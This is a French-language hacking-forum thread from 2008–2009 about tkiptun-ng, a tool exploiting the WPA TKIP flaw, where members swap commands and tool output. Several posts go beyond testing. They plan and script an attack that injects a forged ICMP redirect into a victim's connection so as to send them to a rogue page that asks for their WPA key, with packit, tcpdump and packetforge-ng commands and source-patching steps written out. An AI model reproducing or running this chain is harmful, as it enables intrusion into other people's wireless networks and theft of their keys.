Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 09-11-2008 06:00:12

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Suite à l'effervescence générée par la présentation d'Erik Tews à la PACSEC 2008 "Gone in 900 Seconds, Some Crypto Issues with WPA" (voir le topic intitulé WPA TKIP: une faille sera dévoilée à la PACSEC 2008 de Tokyo), la suite aircrack-ng se dote d'un nouvel outil nommé tkiptun-ng. Cet outil permet d'exploiter la faille concernant le chiffrement TKIP WPA.

Attention, il ne s'agit pas ici de cracker la clé WPA, mais d'etre à meme de pouvoir sniffer et injecter des paquets à destination du client connecté. L'exploitation de cette faille pourrait déboucher sur une possibilité d'attaque man in the middle, il nous reste à mieux comprendre les mécanismes de l'attaque et à apprendre comment utiliser correctement tkiptun-ng... Apparemment l'attaque fonctionne sur la base d'une Chopchop modifiée.

3 points sont nécessaires pour que l'attaque soit à meme de fonctionner:

-Le client et le point d'accès doivent utiliser WPA TKIP (le client doit etre connecté)
-Le client et le point d'accès doivent utiliser le protocole d'adressage réseau IPv4
-Un long délai de renouvellement des clés (re-keying interval) doit etre configuré sur le point d'accès. Sur la plupart des modem/routeurs wifi utilisant tkip, ce délai est fixé par défaut à 3600 secondes, ce qui permet l'attaque.

Tous les détails de l'attaque sont expliqués sur le pdf de Martin Beck et Erik Tews: Practical attacks against WEP and WPA.

Essayons maintenant de passer à la pratique!

Pour vous lancer dans les tests, vous devrez tout d'abord télécharger et installer la dernière version de développement de la suite aircrack-ng, la révision 1214:

svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng
make
make install

Cette version inclut le nouvel algoritme aircrack-ptw2 qui permet de casser de la clé wep 2 fois plus rapidement, la mise à jour ne vous fera donc pas de mal. En activant ma carte en mode monitor, j'ai déja pu voir une petite nouveauté:

airmon-ng a écrit :

bt aircrack-ng # airmon-ng start wlan0


Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
2954    dhcpcd


Interface       Chipset         Driver

wlan0           RTL8187         r8187 (monitor mode enabled)

bt aircrack-ng #

Désormais airmon-ng nous prévient lorsqu'il détecte un processus susceptible de poser un éventuel problème (là il s'agit d'un serveur dhcp qui tourne). Plutot bien vu de la par de la team aircrack-ng ce petit plus smile

Voyons maintenant ce que dit tkiptun-ng:

tkiptun-ng a écrit :

bt Desktop # tkiptun-ng

  Tkiptun-ng 1.0 rc80 r1214 - (C) 2008 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: tkiptun-ng <options> <replay interface>

  Filter options:

      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -D        : disable AP detection

  Replay options:

      -x nbpps  : number of packets per second
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -F        : choose first matching packet
      -e essid  : set target AP SSID

  Debug options:

      -K prga   : keystream for continuation
      -y file   : keystream-file for continuation
      -j        : inject FromDS packets
      -P pmk    : pmk for verification/vuln testing
      -p psk    : psk to calculate pmk with essid

  source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

      --help              : Displays this usage screen

No replay interface specified.

Je me suis préparé une petite config de test avec un point d'accès Linksys en wpa tkip, et un client connecté:

1-airodump-wpa-tkip.png
Image taille réelle ici.

Je vais lancer tkiptun-ng avec la commande suivante:

tkiptun-ng wlan0 -a 00:0C:41:D3:12:81 -h 00:12:F0:6F:ED:38

ou 00:0C:41:D3:12:81 est l'adresse mac du point d'accès (bssid), et 00:12:F0:6F:ED:38 l'adresse mac du client.

2-tkiptun-ng-waiting-for-arp.png
Image taille réelle ici.

tkiptun-ng a écrit :

bt chopchop # tkiptun-ng wlan0 -a 00:0C:41:D3:12:81 -h 00:12:F0:6F:ED:38
The interface MAC (00:C0:CA:11:22:33) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:12:F0:6F:ED:38
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
17:34:26  Michael Test: Successful
17:34:26  Waiting for beacon frame (BSSID: 00:0C:41:D3:12:81) on channel 1
17:34:26  Found specified AP
17:34:26  WPA handshake: 00:0C:41:D3:12:81 capturedF0:6F:ED:38] [ 6| 3 ACKs]
17:34:27  Sending 4 directed DeAuth. STMAC: [00:12:F0:6F:ED:38] [12| 5 ACKs]
17:34:27  Waiting for an ARP data packet comming from the AP...
Read 3571 packets...

Je ne sais pas si j'ai omis un élément dans la commande, ou bien si c'est ma config de test un peu particulière qui pose problème, mais tkiptun-ng est toujours en attente de son ARP data packet et l'attaque ne se poursuit pas, bien que j'ai tenté tous les moyens possibles pour générer des arp sur le réseau...

Je ne manquerais pas de retester tkiptun-ng, si vous avez l'occasion d'expérimenter cet outil venez réagir à ce sujet sur le forum, le but est bien sur d'apprendre à utiliser tkiptun-ng pour comprendre comment fonctionne cette nouvelle attaque et ce que l'on peut en faire wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-11-2008 01:54:04

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Il y a du nouveau sur aircrack-ng.org, la description de tkiptun-ng s'étoffe. On apprend que la version actuelle n'est pas finalisée, et qu'une version fonctionnelle sortira prochainement.

Les infos sont données au compte goute, mais nous avons tout de meme droit à une description de l'attaque, ainsi qu'à un petit exemple d'utilisation ou l'on voit que les paramètres -m et -n (longueurs minimale et maximale des paquets) semblent avoir leur importance dans l'attaque.

Hors Ligne

#3 11-11-2008 13:58:16

tekilaz
Nouveau membre
Inscription : 11-11-2008
Messages : 7

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

hey bon alors j ai testé aussi sur mon réseau wpa tkip, ma freebox v5
pareil que toi... j ai par contre utilisé les parametres n et m comme dans le wiki

voila ce que ca donne chez moi
tkiptun-ng -h 00:01:5f:71:XX:XX -a FE:A3:92:AF:XX:XX -m 80 -n 100 wlan0
Blub 2:38 E6 38 1C 24 15 XX XX
Blub 1:17 DD 0D 69 1D C3 XX XX
Blub 3:29 31 79 E7 E6 CF XX XX
12:00:22  Michael Test: Successful
12:00:22  Waiting for beacon frame (BSSID: FE:A3:92:AF:XX:XX) on channel 10
12:00:22  Found specified AP
12:00:22  Sending 4 directed DeAuth. STMAC: [00:01:5F:71:XX:XX] [17|31 ACKs]
12:00:28  Sending 4 directed DeAuth. STMAC: [00:01:5F:71:XX:XX] [49|106 ACKs]
12:00:33  Sending 4 directed DeAuth. STMAC: [00:01:5F:71:XX:XX] [63|91 ACKs]
12:00:36  WPA handshake: FE:A3:92:AF:XX:XX captured
12:00:36  Waiting for an ARP packet coming from the Client...
Read 319548 packets...


et pareil impossible de chopper une trame ARP pourtant j ai tout fait pour
... suspens...

Hors Ligne

#4 11-11-2008 14:09:46

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Salut tekilaz, bienvenue sur le forum wink

J'ai refait le test, car j'avais oublié d'activer le QoS sur le point d'accès. Mais meme en ayant activé le QoS, cela ne donne rien de plus, ça bloque toujours à:

Waiting for an ARP packet coming from the Client...

Ton point d'accès supporte t il le QoS? Apparemment c'est une condition indispensable pour que l'attaque fonctionne. Sur la description de tkiptun-ng, ils précisent:

NOTE: The tkiptun-ng SVN version is not fully working. A working version will be released shortly.

Donc wait & see...

Hors Ligne

#5 11-11-2008 15:17:44

tekilaz
Nouveau membre
Inscription : 11-11-2008
Messages : 7

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

mon AP est une freebox V5
mais je pense oui qu il supporte la QoS apres est elle activée je ne sais pas.
En effet dans le wiki ils parlent du champ DS, (ancien champ TOS)
apres ouep, je doute que la freebox fasse du QOS, sinon j ai mon ancien routeur WRT43G en carton
mais a voir....

ouep wait&See mais bizzard d avoir releasé un soft qu on peut pas utiliser

Hors Ligne

#6 11-11-2008 16:14:36

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

C'est bizarre en effet, j'ai cherché un peu partout et tous ceux qui veulent utiliser tkiptun-ng sont bloqués. Il faut donc surveiller le svn sur aircrack-ng.org car une version fonctionnelle est censée sortir prochainement.

En tout cas ça leur fait une sacrée pub tout ça!

Je me demande aussi si le QoS est activé par défaut sur les box comme les freebox, Livebox etc (celles en tkip par défaut), car si ce n'est pas le cas l'intéret de l'attaque sera plus que limité.

Hors Ligne

#7 13-11-2008 20:15:17

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

En tout cas, les infos erronées sont encore plus communes que celles qui ne le sont pas...
http://www.kommunauty.fr/article-106-le … ulnerables

Deux chercheurs s'appellant d’Erik Tews et Martin Beck ont réussi cet exploit, réussissant à casser le Protocole d’intégrité de clé temporaire (TKIP) en moins de 15 minutes. Ils n’ont pas réussi cependant à accéder aux données qui voyagent entre le PC et le Router, heuresement smile.


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

#8 14-11-2008 00:40:30

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Il y a de quoi rigoler 5 minutes: "Les clés WPA vulnérables : une clé vient d'être crackée !", comme si des clés WPA n'avaient pas déja été crackées à coup d'attaque dicos depuis un bon moment déja... lol

"Alors maintenant les sécurités de l'internet sans fil sont tous facilement et rapidement vulnérable, que faire alors pour sécuriser votre PC? Passé au WPA2 qui pour l'instant ( et on l'espère pour un bon moment encore ) est encore fiable !"  lol WPA 2 peut également utiliser le chiffrement TKIP, et donc etre vulnérable de la meme manière smile

Ah la la qu'est ce qu'on se marre en lisant ce genre d'article lol

Bon, de toute manière, malgré tout le buzz que cette nouvelle attaque a suscité, pour l'instant on n'a qu'un tool "not fully working", traduisons par non utilisable en l'état. La patience est de rigueur, et nous verrons bien ce que l'on peut éspérer tirer de tkiptun-ng lorsqu'une version pleinement fonctionnelle sera publiée.

Hors Ligne

#9 28-11-2008 18:58:45

seb-taz
Membre
Inscription : 28-11-2008
Messages : 17

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Salut
après m'être battu avec la page d'inscription (BT3 mis a jour, firefox 3 et la dernière jre et bien je ne voyais pas le cryptogram )
j'arrive ici avec une info :
pour passer le wait for ARP il faut que votre victime sois sous linux ou au moins que dans la colonne probe de airmon-ng il y ai votre essid .

Mais aussi une question :
Est ce que quelqu'un a trouvé quoi faire avec seul un ARP ?

Hors Ligne

#10 28-11-2008 19:34:50

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Salut seb-taz, et bienvenue sur le forum wink (je crois bien que j'ai déja lu pas mal de tes posts sur le forum backtrack-fr.net, si tu es bien le seb-taz auquel je pense)

C'est bon à savoir, merci pour cette info. Tu as testé toi meme, et réussi à franchir l'étape "Waiting for an ARP data packet comming from the AP..."?

Alors dans ce cas tu as du obtenir un keystream (probablement un fichier .xor). Voila ce qui est dit sur le pdf:

After the MIC and the plaintext of the packet is known, an attacker can simply re-
verse the MICHAEL algorithm and recover the MIC key used to protect packets being
send from the access point to the client. The MICHAEL algorithm is not designed
to be a one-way function and reversing the algorithm is as efficient as calculating the
algorithm forward.
At this point, the attacker has recovered the MIC key and knows a keystream for
access point to client communication. He is now able to send a custom packet to the
client on every QoS channel, where the TSC counter is still lower than the value used
for the captured packet. In most networks in the wild, all traffic is just transmitted
on channel 0, so that the attacker is now able to send 7 custom packets to the client.
After the attack has been successfully executed, an attacker can recover an additional
keystream within 4-5 minutes, because he just needs to decrypt the 4 byte ICV using
chopchop. The ip address bytes can be guessed, the MIC can then be calculated using
the known MIC key and then be verified against the ICV.
To cause damage, the attacker could for example send messages triggering IDS
systems which work on the IP layer. Alternatively, traffic could be rerouted using
fake ARP responses. The attacker could try to establish a bidirectional channel to
the client, if the client is connected to the internet using a firewall blocking incoming
traffic, but allowing outgoing traffic. The responses of the client cannot be read over
the air by the attacker, but could be routed back over the internet.

Bon, en gros le keystream récupéré te permet de communiquer avec le client, et cela rend à priori le mitm possible. Je comprend bien que l'on puisse à partir de là faire de l'arp poisoning en direction du client, mais dans la mesure ou on n'est pas connecté au réseau, je ne vois pas trop non plus comment exploiter l'arp poisoning hmm

Hors Ligne

#11 04-12-2008 12:29:26

seb-taz
Membre
Inscription : 28-11-2008
Messages : 17

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Need help !!!

Avis au amateurs de C il faut aller modifier la source de tkiptun explication:
1) le tool récupère un handshake
2) il récupère deux ARP un venant de la victime et un du Point d'acces
3) grâce a une attaque chopchop il va décoder les deux inconnues qui sont les adresses ip du PA et du client
4) il crée un fichier .xor qui sert a encrypter le seul paquet que nous pourrons rejouer
et ça serai bien qu'il s'arrète là mais :
5) il utilise le fragment xor pour construire un ARP et le rejouer. -> c'est ce qui nous gène.

pourquoi:
comme choix d'attaque nous avons:
ARP spoofing qui permet de rediriger toutes les requêtes vers notre pc
problèmes : 1- il faut être connecté au réseau interne
                   2- il faut pouvoir décrypter ce que l'on reçois donc il faut la clé wpa

dns spoofing: qui permet de se faire passer pour le vrai serveur ex google
problèmes : 1- il faut répondre avant le serveur (environ 1/4 de seconde)
                   2- il faut répondre sur le bon port = 1 chance sur 65635 on peut diminuer ce pourcentage en sachant qu'il y a des ports réservés et que les systèmes d'exploitations sont semi-prévisibles mais pas a moins de 1/1000.

Icmp redirect: ça c'est intéressant : ça sert a mettre a jour la table de routage pour trouver le chemin le plus court vers un serveur donc si on dit a notre victime que pour aller sur msn il est plus court de passer par notre serveur c'est notre page qui va s'afficher.  :-)
1- besoin de 1 seul paquet -> c'est parfais on a que ça..
2- ce n'est pas arrété ni par les routeurs, ni les antivirus
problèmes : 1- il nous faut un serveur accessible par internet avec les pages GTWPA et il faut récupérer la clé

un petit résumé :
1) tkiptun recupère le fragment xor
2) on construit notre paquet icmp redirect grâce aux ip de la victime et de son routeur
3) on lui envoi et dès qu'il va se connecter sur le google ou ce que vous voulez il va tomber sur notre page qui lui demande sa clé wpa
4) il faut récupérer la clé (pigeon voyageur, email sur tel portable,...)
5) bingo vous venez d'utiliser la seule faille wpa connue a ce jour

To Do:
1) empêcher tkiptun d'envoyer son ARP (j'ai essayer en bash de faire un kill lorsque il y a écrit xor mais sans succès si quelqu'un y arrive ça peut être une alternative a la modification de tkiptun-ng.c)
2) utliser les ip et le xor pour construire un icmp_redirect (http://insecure.org/sploits/arp.games.html)

Hors Ligne

#12 04-12-2008 13:17:36

Atrax
Membre Hyperactif
Inscription : 17-11-2008
Messages : 53

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Je n'y connais rien en C pour ma part, alors ma modeste contribution sera le lien vers la source en question :
tkiptun-ng.c

Hors Ligne

#13 04-12-2008 20:32:26

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Voila un concept d'attaque assez spectaculaire et ambitieux! smile

C'est toutefois la seule alternative si une attaque airbase-ng n'aboutit pas avec un client connecté en WPA, d'ailleurs il y a de grandes chances que GTWPA évolue dans ce sens, dans la mesure ou tkiptun-ng pourrait donner des résultats positifs, ce qui n'a pas été le cas sur tous nos tests airbase-ng avec un client en WPA. Pour ce qui est du serveur web seb-taz, il y a toujours la possibilité de forwarder le port 80 vers ton serveur rogue, et de rediriger le client vers ton ip tout simplement.

Tu as raison de t'intéresser à cette solution, je pense que c'est notre seule alternative pour une attaque efficace... Mais ça va demander énormément de travail!

Hors Ligne

#14 06-12-2008 07:21:04

seb-taz
Membre
Inscription : 28-11-2008
Messages : 17

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

1) J'ai modifier la source de tkiptun
supprimer les lignes 4342 a 4347 et les lignes 4360 a 4363
2) J'ai modifier la source de packetforge-ng
supprimer les lignes 1390 a 1395
3) recompilez le logiciel
4) J'ai galérer pour récupérer les ip données par tkiptun
tkiptun-ng -h $client -a $bssid $inject  | tee /root/tac.txt &&
routip=$(grep "AP MAC" /root/tac.txt | cut -c41-56)
clientip=$(grep "Client MAC" /root/tac.txt | cut -c45-61)
5) et selectionner automatiquement le .xor
cd /root
xor=$(ls | grep *.xor)
6) Me suis battu avec packit pour créer un icmp redirect valid
packit -m inject -t ICMP -K 5 -C 1 -c 1 -vvv -j $routip -l 216.239.59.99 -m 1000 -g 86.216.99.65 -s $routip -d $clientip -i wlan1
7) Passé des heures a lire le man tcpdump
tcpdump -i lo 'icmp[0]=5' -c 1 -w icapmp
8) Filé le tout a packetforge pour qu'il me l'encode avec le .xor
packetforge-ng -9 -r icapmp -y $xor

et voila sa réponse :
your xor is to short

  Seb (triste)

Hors Ligne

#15 06-12-2008 12:09:15

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Tu as touché du bout des doigts notre reve à tous... Il faut ruser pour exploiter tkiptun-ng sur un réseau auquel on n'est pas connecté, je pense que tu es sur la bonne voie, félicitations pour ton travail acharné smile

Tkiptun-ng n'est pas encore pleinement fonctionnel, d'après ce qui est dit sur aircrack-ng.org. Avec la version originale de tkiptun-ng, pouvais tu vraiment injecter des arp en direction du client? As tu vérifié que cela fonctionnait, par exemple en lançant wireshark sur le client? Pour le xor too short, les options ont l'air d'etre les bonnes pour créer un "custom packet", donc le xor généré par tkiptun-ng semble etre la source du problème. Probablement que tu auras la meme réponse de packetforge en essayant de créer une requete arp, mais ce serait bien de faire le test pour vérifier.

Là tu es vraiment sur la bonne voie, donc il faut continuer dans ce sens en essayant de comprendre:

-Tkiptun-ng fonctionne t il correctement?
-Le .xor généré est il utilisable?
-Est ce vraiment possible d'utiliser le .xor pour générer un custom packet avec packetforge afin de le réinjecter?

Je crois qu'il serait intéressant de poser ces quelques questions sur le forum Aircrack-ng, comme il est fréquenté par la team aircrack-ng (ceux qui développent le soft) il y a de bonnes chances qu'ils puissent donner quelques conseils utiles, et nous aider à comprendre comment exploiter cet outil...

Voila, quoi qu'il en soit ton travail là dessus nous fait avancer dans la bonne direction, un grand merci à toi seb-taz wink

Hors Ligne

#16 17-12-2008 10:56:43

Riconaute
Nouveau membre
Inscription : 12-12-2008
Messages : 9

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Salut à tous,

Seb quand tu fais:

8) Filé le tout a packetforge pour qu'il me l'encode avec le .xor
packetforge-ng -9 -r icapmp -y $xor

-> l'outil packetforge est dédié au WEP, par conséquent ton .xor que tu as capturé en WPA ne fonctionnnera pas avec packetforge.

Riconaute

Hors Ligne

#17 23-12-2008 00:44:37

seb-taz
Membre
Inscription : 28-11-2008
Messages : 17

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

un ptit update :
comme je suis plutôt acharné j'ai recommencé

phase préparation:
1) modifiez la source de tkiptun pour éviter l'envoi automatique de l'arp :
supprimer les lignes 4342 a 4347 et les lignes 4360 a 4363  OK
2) compilez le logiciel  OK
3) télécharger net-lorcon et en comprendre le fonctionnement  OK
4) mettre un live cd de BT dans le pc victime, le connecter au net, lancer wireshark en écoute  OK
5) placer une deuxième carte wifi en mode monitor + airodump sur chaque pc pour le contrôle. OK

phase test :
1) lancer tkiptun et récupérer le fichier .xor et le paquet arp dont on a évité l'envoi  OK
2) utiliser packetforge-ng pour créer une requête arp en lui indiquant le xor de tkiptun  OK
3) l'ouvrir avec wireshark puis recopier ce paquet dans net-lorcon  OK
4) perl inject.pl  et là merveille au même moment une requête s'affiche sur le pc victime OK

phase attaque :
1) "
2) utiliser net-l.. pour construire un icmp redirect et le sniffer avec wireshark pour l'avoir en pcap
3) utiliser packetforge custom pour le xorer
4) pleurer parce que la démarche doit être bonne mais le xor est trop court

5) recommencer en passant en paramètre -m 100 -n 130 a tkiptun pour augmenter la taille du xor
6) attendre vraiment longtemps pour finalement arriver sur une erreur
7) laisser tomber

conclusion : c'était pas loin...

ps :
le wpa tkip à été mis en place pour opérer une transition entre le wep et le CCMP/AES il utilise une partie du protocole wep donc les outils comme packetforge fonctionnent aussi bien sur l'un que sur l'autre..
consultez ce blog http://sid.rstack.org/blog/index.php/30 … es-de-tkip pour des informations détaillées

A +

Hors Ligne

#18 23-12-2008 12:49:38

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Merci pour tes efforts seb-taz, tout ceci est vraiment très intéressant et je pense que tu es sur la bonne piste. J'ai vu que tu as posté sur le forum aircrack-ng (qui est à nouveau online smile ) pour leur demander conseil, j'éspère qu'ils pourront nous aider à comprendre comment tirer quelque chose de tkiptun-ng, car cet outil a tout de meme l'air assez difficile à exploiter pour l'instant.

Hors Ligne

#19 28-01-2009 17:14:06

Riconaute
Nouveau membre
Inscription : 12-12-2008
Messages : 9

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Re-bonjour,
Petite question peut être idiote mais bon...
Est ce que le fait de travailler sur un ARP request qui est une trame de broadcast  (ou l'on recupère normalement  son keystram (fragment xor)) va nous permettre de le réutiliser pour envoyer des  trames unicasts? Car en WPA-TKIP, nous avons une clé PTK (pour l'unicast) et une clé GTK(pour le broadcast).

Hors Ligne

#20 17-04-2009 13:45:23

dev.null
Nouveau membre
Inscription : 13-04-2009
Messages : 8

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

ouepa tout lle monde...

bonne surprises...je lis bcp ces derniers temps sur la suite aircrack-ng et le fameux tkiptun-ng... j'ai également lu tout ce post et je pensais tout d'abord abandonné vu la complexité du truc...(non pas sans avoir essayé)

aujourd'hui, un nouveau petit joujou de plus (pda)me motive à refaire le test :
(acharné moi aussi...)

modem zyxel
securité WPA-TKIP
QoS activé
et temps de reauth a 3600 (originalement a 1800 et rien la dernière fois)

je lance tkiptun-ng (j'ai essayé la suppression dans la src mais pas réussi à recompiler) comme indiqué sur le wiki avec -m 80 -n 100 et ô surprise la première étape passe ou tout le monde bloquait passe :

tkiptun recoit le paquet du client..
l'enregistre
puis envoie un à l'ap
puis affiche got the answer
puis Waiting 5 seconds to let encrypted EAPOL frames pass without interfering
puis très longue procédure comme le chopchop ou il envoie des paquet et affiche le current guess...

suis de loin pas un crack comme les gens qui ont posté ci-dessus mais peut-etre que c infos vont aider...

si jamais j'ai EEEPC - BT4 - et sauf erreur la dernière version de la suite aircrack-ng

le test tourne toujours

il vient d'afficher Moved one step backwards to chop the last byte again.
et recommence l'envoi de paquet et guess...

je laisse tourner


A+

Hors Ligne

#21 27-04-2009 21:47:00

dev.null
Nouveau membre
Inscription : 13-04-2009
Messages : 8

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

toujours pas moyen de faire avancer le test...

je reste bloqué à la ligne :

22:47:04  Offset   99 ( 0% done) | xor = BA | pt = 75 |  197 frames written in 162637ms

et ca va pas plus loin...à cette vitesse là, va pas se passer grand chose... surtout si j'ai constemment le 'move one step backwards'....

j'ai posté à ce sujet sur d'autre forums mais pas de réponses...sniff

EDIT**********j'allais me décider à poster sur le forum aircrack-ng mais le site est down depuis une semaine au moins !!!*********EDIT

est-ce que ca veut dire qu'on aura bientôt la suite des news sur tkiptun-ng du team aircrack-ng big_smile

il suffit que j'écrive le post pour que le site soit de nouveau UP !!! En avant  la lecture lol

A bientot

Dernière modification par dev.null (27-04-2009 21:49:58)

Hors Ligne

#22 27-04-2009 22:09:17

dev.null
Nouveau membre
Inscription : 13-04-2009
Messages : 8

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

eh ben moi qui m'attendait a des news sur les tools d'aircrack...

y'a un GULU qu'a fait une DoS contre aircrack-ng.org (1,5Tb de traffic généré en 2 jours) et ça a fait des coûts évidemment que l'équipe a dû payer au FAI pour remettre le site online.

y'a vraiment toujours des imbéciles pour s'en prendrent au mauvaises personnes !!!

à part ça : appel aux dons sur aircrack-ng.org !!! aidons les a continuer leurs boulot de maîtres !!!

Hors Ligne

#23 27-04-2009 22:40:38

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

Ouf! Ils sont à nouveau online! smile Ca fait plaisir à voir!

Hors Ligne

#24 07-05-2009 21:32:46

pisslin
N00b
Inscription : 07-05-2009
Messages : 1

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

salut, toujours pas de news sur cette outil après les super tests a seb-taz de decembre 2008 ?

Hors Ligne

#25 31-05-2009 11:19:56

Morph
Membre Radioactif
Inscription : 24-05-2009
Messages : 72

Re : Tkiptun-ng: le nouvel outil pour casser le TKIP (faille WPA)

questions de noob:

quesceque -une trame ARP???
                -des  trames unicasts

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.035 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]